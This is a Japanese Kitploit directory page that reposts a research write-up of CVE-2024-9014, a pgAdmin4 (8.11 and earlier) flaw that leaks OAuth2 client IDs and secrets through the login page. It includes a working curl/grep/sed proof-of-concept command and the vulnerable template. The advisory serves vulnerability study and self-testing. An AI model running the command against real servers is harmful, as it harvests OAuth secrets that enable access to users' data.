Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9014 — Pgadmin4 の機密情報の露出 | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2024-9014
脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテスト学習と教育
GitHubeqstlab/cve-2024-9014

CVE-2024-9014

Pgadmin4 の機密情報の露出

リポジトリを見る
8131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

この投稿は EQSTLab が公開した研究記事です。

CVE-2024-9014

★ CVE-2024-9014 機密情報漏えい PoC ★

説明

CVE-2024-9014 : pgAdmin4 の機密情報漏えい

解説: pgAdmin バージョン 8.11 以前には、OAuth2 認証におけるセキュリティ上の欠陥があります。この脆弱性により、攻撃者はクライアント ID とシークレットを取得できる可能性があり、ユーザーデータへの不正アクセスにつながります。

PoC

コマンド

root@kitploit:~
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

例

root@kitploit:~
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

出力

pgadmin4-8.9 および pgadmin4-8.12 alt text

分析

脆弱性箇所 (pgadmin/templates/security/login_user.html)

この箇所で、config.OAUTH2_CONFIG 変数は OAUTH2_CLIENT_ID と OAUTH2_CLIENT_SECRET を含む OAUTH2 設定ファイルを返します。

root@kitploit:~
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}


パッチ

alt text

シナリオ

プライベート情報の漏えい

OAuth の秘密パラメータを特定し保護することは非常に重要です。“client_id” は安全に公開できますが、“client_secret” を公開すると重大なリスクが生じます。 client_secret が漏えいした場合、攻撃者はアプリケーションのアイデンティティと信頼を悪用して、ユーザーの “access token” や個人情報を窃取する可能性があります。

免責事項

このリポジトリは、CVE-2024-9014 に関する機密情報を漏えいさせることを意図したものではありません。このプロジェクトの目的は、この脆弱性について学び、自身のアプリケーションをテストする際の助けとなることです。

EQST Insight

当社は CVE およびマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご確認ください。 https://www.skshieldus.com/eng/business/insight.do

参考

https://nvd.nist.gov/vuln/detail/CVE-2024-9014

ツールをダウンロード